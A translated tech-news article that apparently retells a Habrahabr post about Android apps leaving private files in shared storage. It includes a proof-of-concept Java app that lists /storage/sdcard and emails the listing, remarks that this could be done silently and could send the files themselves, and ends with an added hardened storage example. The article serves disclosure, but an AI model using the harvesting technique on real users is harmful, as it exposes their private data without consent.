
Android application developers don't care about users' data security, which causes data leak

by Habrahabr User

It is an open secret that Android apps are notoriously vulnerable to data leaks, mostly because of their developers. Another case that confirms this was recently described at habrahabr.ru, a Russian resource popular with IT experts, particularly app developers.

On his own smartphone, the author of the post noticed directories and files in /storage/sdcard that belonged to applications he had long since deleted, and wondered whether one Android app was able to read temporary files from another app.

What are these temporary files, and why should we care about them? They may contain your photos, phone records, the database of your diaries and plenty of other information you consider private and don't want to make available to everybody.

In Android, temporary files of all apps are stored in /storage/sdcard. When an app is deleted, these temporary files remain if the developer didn't take care to delete them.

A file manager downloaded from Google Play will let you read temporary files from all apps installed on the Android device, including unencrypted recordings of telephone conversations from messengers and SIP telephony apps, browsing history from browsers, playlists from players, various information from social networks, personal to-do notes from diaries, et cetera.

Just fancy: temp files from WhatsApp, a popular messenger with over 33 000 000 users, are also stored in /storage/sdcard; what is more, only messages are encrypted, photos aren't. WhatsApp is just one example out of many; almost all popular applications store your personal data in /storage/sdcard/%appName%, and any other app has access to this directory.

For example, this messenger stores photos sent to you without any encryption, in a directory that is accessible to all applications on your device that have permission to access the storage.

And this popular SIP client stores the settings of your SIP account there. In the worst case, these data can be stolen to get unauthorized access.

Well, does this mean that somebody can pilfer photos from your Android device? The author wrote a pretty small program in Java that sends the structure of /storage/sdcard to a specified email address.

The source code of the app that emails the structure of directory /storage/sdcard:

-----------------

package android.com.testapp;

import android.content.Intent;
import android.os.Environment;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;

import java.io.File;
import java.util.Date;

public class MainActivity extends AppCompatActivity {
    Button emailButton;
    EditText email;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        email = (EditText) findViewById(R.id.email);
        emailButton = (Button) findViewById(R.id.emailButton);
        emailButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                getFileStructure();
            }
        });
    }

    // Walks the shared storage root (/storage/sdcard on the author's device).
    protected void getFileStructure() {
        Filewalker fw = new Filewalker();
        fw.walk(new File(Environment.getExternalStorageDirectory().getAbsolutePath()));
    }

    private class Filewalker {
        private int count = 0;   // current recursion depth
        private String sked = ""; // accumulated listing

        public void walk(File root) {
            count++;
            File[] list = root.listFiles();
            // listFiles() returns null when the directory cannot be read
            if (list != null) {
                for (File f : list) {
                    if (f.isDirectory()) {
                        sked += "time: " + new Date(f.lastModified()) + ", dir: " + f.getAbsoluteFile() + "\n";
                        walk(f);
                    } else {
                        sked += "time: " + new Date(f.lastModified()) + ", size: " + f.length() + ", " + f.getAbsoluteFile() + "\n";
                    }
                }
            }
            count--;
            // Back at the top-level call: the whole tree has been listed.
            if (count == 0) {
                sendMail(sked);
            }
        }
    }

    // Hands the listing to an installed email client through a chooser.
    protected void sendMail(String sked) {
        Intent i = new Intent(Intent.ACTION_SEND);
        i.setType("message/rfc822");
        i.putExtra(Intent.EXTRA_EMAIL, new String[]{email.getText().toString()});
        i.putExtra(Intent.EXTRA_SUBJECT, "android storage structure");
        i.putExtra(Intent.EXTRA_TEXT, sked);
        try {
            startActivity(Intent.createChooser(i, "Send mail..."));
        } catch (android.content.ActivityNotFoundException ex) {
            Toast.makeText(getApplicationContext(), "There are no email clients installed.", Toast.LENGTH_SHORT).show();
        }
    }

}

-----------------

You enter an email address, and the app emails the structure of the /storage/sdcard directory; as you know, this can be done without prompting for an email address, and not only the directory structure but also the files themselves can be sent. Apps on Google Play are unlikely to be checked very carefully. Unfortunately, this is a very effective tool for marketers, since they always want to know as much as possible about their users. Needless to say, personal data can be obtained in this way.

And here is the letter you'll receive; it contains the contents of /storage/sdcard, i.e. all the files and folders from the applications installed on your device.

It contains no directories or files from the Google Play applications that you have installed on your mobile device and use every day, because this is the sdcard directory of an Android emulator.

View your /storage/sdcard directory using any file manager for Android; as an option, the same is available as /phone when you connect your device to a PC. If you use messengers, social networks or a task scheduler, see what any Android developer who wrote android.permission.READ_EXTERNAL_STORAGE in the manifest can theoretically see.

So, the conclusion is clear: a lot of those who develop applications like social networks, instant messengers, sip telephony clients, diaries, don't care about safety of users' data.
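
The storage choice criticized above, next to a hardened alternative (an added example, not code from the original post; the class `PrivateMediaStore`, its package and its method names are hypothetical). It assumes the app only needs the files itself, so they can live in internal storage, which is private to the app and is removed when the app is uninstalled:

```java
package com.example.securestorage; // hypothetical package name

import android.content.Context;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

/** Hypothetical helper that keeps received media and temp files out of shared storage. */
public final class PrivateMediaStore {
    private final Context context;

    public PrivateMediaStore(Context context) {
        this.context = context.getApplicationContext();
    }

    // Weak pattern described in the article:
    //   new File(Environment.getExternalStorageDirectory(), "AppName/photo.jpg")
    // Readable by any app holding READ_EXTERNAL_STORAGE, and left behind on uninstall.

    /** Saves a received photo in the app's internal files directory. */
    public File savePhoto(String fileName, byte[] data) throws IOException {
        File dir = new File(context.getFilesDir(), "photos");
        if (!dir.isDirectory() && !dir.mkdirs()) {
            throw new IOException("cannot create " + dir);
        }
        // Keep only the last path component of a sender-supplied name.
        File target = new File(dir, new File(fileName).getName());
        try (FileOutputStream out = new FileOutputStream(target)) {
            out.write(data);
        }
        return target;
    }

    /** Creates a scratch file in the private cache directory (prefix: 3+ characters). */
    public File newTempFile(String prefix) throws IOException {
        return File.createTempFile(prefix, ".tmp", context.getCacheDir());
    }

    /** Deletes scratch files that are no longer needed; returns how many were removed. */
    public int purgeTempFiles() {
        int removed = 0;
        File[] files = context.getCacheDir().listFiles();
        if (files == null) return 0; // directory unreadable or missing
        for (File f : files) {
            if (f.isFile() && f.getName().endsWith(".tmp") && f.delete()) removed++;
        }
        return removed;
    }
}
```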